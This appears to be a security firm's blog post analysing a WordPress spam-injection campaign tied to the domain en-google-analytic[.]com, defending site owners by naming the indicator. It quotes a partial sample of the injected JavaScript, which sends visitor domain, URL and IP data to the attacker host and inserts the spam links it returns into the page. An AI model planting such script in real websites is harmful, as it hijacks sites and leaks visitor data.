The domain en-google-analytic[.]com, currently sinkholed by a security intelligence company, has been observed by our team to be part of a mass spam injection campaign. This attack was active as far back as February 2016 according to the Internet Archive Wayback Machine.
We have seen recent cases in the wild where a script is injected into WordPress posts. The script then generates an AJAX request from a visitor’s web browser to the following URL format:
hxxp://en-google-analytic[.]com/client-slots/check/<fully qualified domain name>;<base64 encoded string of the URL>;<string of the IP address>;ver1_0
The results are then inserted directly into the document body by using JavaScript to insert spam links (as shown in the partial sample below):
clientInfo.callGet('hxxp://en-google-analytic[.]com/client-slots/check/' + dataString, function(dataLinks) {
if (dataLinks) {
dataLinks =
JSON.parse(dataLinks);
for (var i = 0; i < dataLinks.length; i++) {
var div1 = document.createElement('a');
div1.title = dataLinks[i].anchor;
div1.href = dataLinks[i].href;
div1.setAttribute('style', 'display:block;');
div1.innerHTML = dataLinks[i].anchor;
document.body.insertBefore(div1, document.body.firstChild);
}
} It’s worth noting that this piece of malware captures the IP address using a remote request to api.ipify.org which is a legitimate third-party API service.
So, if you happen to stumble upon references to en-google-analytic[.]com on your website or in your WordPress posts, it would be a good idea to have the site checked out to make sure it’s not infected with spam as part of this campaign.
Douglas Santos
Kayleigh Martin
Luke Leal
Fioravante Souza
Rianna MacLeod
Daniel Cid
Denis Sinegubko
Krasimir Konov